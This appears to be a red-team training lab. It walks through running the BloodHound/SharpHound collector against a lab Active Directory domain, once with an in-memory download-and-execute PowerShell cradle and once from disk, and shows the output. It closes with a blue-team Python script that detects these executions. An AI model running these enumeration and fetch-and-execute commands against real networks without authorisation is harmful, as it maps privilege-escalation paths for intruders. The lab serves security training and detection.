L1120-Red BloodHound and SharpHound

Lab Overview

The BloodHound tools are based in part on the Active Directory Control Paths project. The toolkit enumerates a wide array of information available from Active Directory. Coupled with the Neo4j interface, this is an incredible tool with varied implications for both blue and red teams. From a red team perspective, the BloodHound toolkit can assist a tester with visually mapping the fastest paths to a domain admin or other specific high-interest target. Blue teams can use this tool to keep an eye on paths, privileged sessions, account usage, group membership, and more.

Import and execute BloodHound, an enumeration script that gathers information about Active Directory. Then search for the execution of the script in the Optics Infrastructure.

Attack Step One

Invoke BloodHound from Memory

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.

PowerShell

Launch Windows PowerShell from the Windows Start Menu.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input

whoami
hostname

PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Execute BloodHound From Internet

The next group of commands enables TLS 1.2, downloads a PowerShell script from the internet, loads it directly into memory without writing it to disk, and then executes it.

PowerShell Input

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')
Invoke-BloodHound

PowerShell Output

PS C:\Users\itadmin> IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')
PS C:\Users\itadmin> Invoke-BloodHound
-----------------------------------------------
Initializing SharpHound at 6:45 AM on 6/28/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain LABS.LOCAL using path CN=Schema,CN=Configuration,DC=LABS,DC=LOCAL
PS C:\Users\itadmin> [+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 84 MB RAM
Status: 277 objects finished (+277 277)/s -- Using 113 MB RAM
Enumeration finished in 00:00:01.1059298
Compressing data to C:\Users\itadmin\20200628064526_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 6:45 AM on 6/28/2020! Happy Graphing!

With the SharpHound tool completed, move on to the next step of this lab.

Attack Step Two

Execute BloodHound From Disk

Download, extract, and execute the BloodHoundAD data collector via PowerShell.

Login to Member Server

Connect via Remote Desktop to the Member Server, WS01.

PowerShell

Launch Windows PowerShell from the Windows Start Menu.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input

whoami
hostname

PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Bloodhound From Disk

From the PowerShell console, we enable TLS 1.2, download the BloodHound release archive from GitHub, expand the archive, import the SharpHound PowerShell module from the extracted folder, and lastly run Invoke-BloodHound.

PowerShell Input

$ProgressPreference = 'SilentlyContinue'                    # suppress the Invoke-WebRequest progress bar
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://github.com/BloodHoundAD/BloodHound/archive/master.zip -OutFile "master.zip"
Expand-Archive master.zip                                    # extracts to .\master\BloodHound-master\
Import-Module .\master\BloodHound-master\Collectors\SharpHound.ps1
Invoke-BloodHound

PowerShell Output

-----------------------------------------------
Initializing SharpHound at 7:01 AM on 6/28/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain LABS.LOCAL using path CN=Schema,CN=Configuration,DC=LABS,DC=LOCAL
PS C:\Users\itadmin> [+] Cache File Found! Loaded 521 Objects in cache
PS C:\Users\itadmin>
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 103 MB RAM
Status: 277 objects finished (+277 ∞)/s -- Using 110 MB RAM
Enumeration finished in 00:00:00.5343055
Compressing data to C:\Users\itadmin\20200628070125_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 7:01 AM on 6/28/2020! Happy Graphing!

Having invoked the BloodHound ingestors using two different methods, let's look at hunting for these activities.
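As an added example (not part of this lab), the following Python script shows how a blue team could hunt for both execution methods above by running pattern rules over PowerShell Script Block Logging records (Event ID 4104) and collector output artifacts. The record format and the sample records are constructed for illustration; the patterns are taken from the commands and output shown in this lab.

```python
import re

# Detection rules for the two SharpHound execution patterns shown in this lab.
# Each rule is (name, regex). Matching is case-insensitive because PowerShell
# itself is case-insensitive (IEX vs iex, Net.Webclient vs Net.WebClient).
RULES = [
    ("download_cradle",   # in-memory cradle: IEX (New-Object Net.WebClient).DownloadString(...)
     r"(?:IEX|Invoke-Expression)\s*\(?\s*New-Object\s+Net\.WebClient\s*\)?\s*\.DownloadString"),
    ("sharphound_fetch",  # collector script or release archive referenced by name
     r"(?:SharpHound\.ps1|BloodHound/archive/master\.zip)"),
    ("sharphound_invoke", r"\bInvoke-BloodHound\b"),
    ("sharphound_import", r"Import-Module\s+\S*SharpHound\.ps1"),
    ("collector_output",  # timestamped zip SharpHound writes, e.g. 20200628064526_BloodHound.zip
     r"\d{14}_BloodHound\.zip"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]

def match_rules(text):
    """Return the names of every rule that fires on one script block or log line."""
    return [name for name, rx in COMPILED if rx.search(text)]

def hunt(records):
    """records: list of dicts {host, user, text}, e.g. 4104 script-block text (assumed format).
    Returns one finding per record that fires at least one rule."""
    findings = []
    for rec in records:
        hits = match_rules(rec["text"])
        if hits:
            findings.append({"host": rec["host"], "user": rec["user"], "rules": hits})
    return findings

# Constructed sample records modelled on the commands this lab runs (not real telemetry).
SAMPLE_RECORDS = [
    {"host": "ws01", "user": "labs\\itadmin",
     "text": "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')"},
    {"host": "ws01", "user": "labs\\itadmin", "text": "Invoke-BloodHound"},
    {"host": "ws01", "user": "labs\\itadmin",
     "text": "Import-Module .\\master\\BloodHound-master\\Collectors\\SharpHound.ps1"},
    {"host": "ws01", "user": "labs\\itadmin", "text": "Get-ChildItem C:\\Users\\itadmin"},  # benign
    {"host": "ws01", "user": "labs\\itadmin",
     "text": "Compressing data to C:\\Users\\itadmin\\20200628064526_BloodHound.zip"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_RECORDS):
        print(finding)
```

Note that the benign Get-ChildItem record produces no finding, while the in-memory cradle fires two rules at once (the cradle itself and the SharpHound.ps1 reference), which is a useful way to rank alerts.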

Continue on to L1120-Blue

Lab Complete